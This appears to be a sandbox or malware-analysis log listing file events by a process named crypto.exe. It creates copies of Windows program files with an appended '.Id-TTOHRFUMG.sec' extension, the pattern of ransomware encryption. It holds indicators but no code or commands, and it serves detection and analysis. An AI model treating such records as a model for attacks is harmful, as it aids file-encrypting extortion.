File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02373_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\MMHMM.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-string-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00810_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\ACADEMIC.ONE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_hover.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_sl.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Premium.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16\windows-amd64\profilerinterface.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01176_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe	crypto.exe
File created	C:\Program Files\7-Zip\Lang\mng.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\7zCon.sfx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\management\management.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0158477.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183172.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292270.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\OL.SAM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-8.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15173_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libfreeze_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Kabul.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Northwind.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\en-US\setup_wm.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME08.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libcroppadd_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\msproof7.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\MCESidebarCtrl.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\JAWTAccessBridge-64.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Puerto_Rico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-uisupport.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Almaty.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Australia\Eucla.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-foreground.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304875.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02465_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\INFINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ca.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\GRID_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14580_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.IN.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Curacao.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\glass.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00057_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Brunei.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00760L.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIcons.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_chromecast_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Amman.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PRRTINST.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\TEAROFF.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Grid.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR47F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OFFOWC.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Synchronization Services\ADO.NET\v1.0\Microsoft.Synchronization.Data.Server.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Clarity.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\pt-PT.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_foggy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107516.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\slideShow.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up_BIDI.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dili.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands_3.6.100.v20140528-1422.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18187_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\ROGERS.COM.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_rgb_mmx_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_pressed.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wallis.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Palau.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRdIF.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hovd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SOCIALCONNECTOR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PPINTL.REST.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSPUB_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDRESPL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIconsMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL022.XML.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099182.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Dili.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BCSRuntime.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Temp\GUM2396.tmp\GoogleUpdateSetup.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\tr.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Earthy.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\28.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightItalic.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayenne.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18238_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGTEAR.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libidummy_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libscaletempo_pitch_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jfxmedia.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297725.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00095_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Thatch.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_left.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_cycle_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hiring Requisition - Customized.fdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jp2ssv.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+5.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGATNGET.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Wordcnvpxy.cnv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\be.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BORDERS\MSART5.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\WSSFilesToolHomePageBackground.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewFrame.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\URBAN_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE.MANIFEST.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\setting_back.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200163.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0300862.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0199549.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\OMSSMS.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDREQL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.Infopath.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_mms_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Reykjavik.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00455_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Rome.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha1.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.ui_1.1.200.v20130626-2037.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Antarctica\Vostok.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00197_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DOTS.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Notes_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21323_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-next-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01639_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\plugins.dat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonDown_On.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Monaco.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Gibraltar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXSLE.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Verve.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\MANUAL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_mainImage-mask.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Creston.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188667.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ReviewRouting_Init.xsn.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qyzylorda.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00184_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099174.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_fr.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.events_3.0.0.draft20060413_v201105210656.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174315.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21364_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GRAPH_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ext.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0318810.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0149887.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21377_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285782.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\rmiregistry.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Antarctica\Syowa.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03470_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00014_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Elegant.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ACCWIZ\ACWZTOOL.ACCDE.Id-TTOHRFUMG.sec	crypto.exe
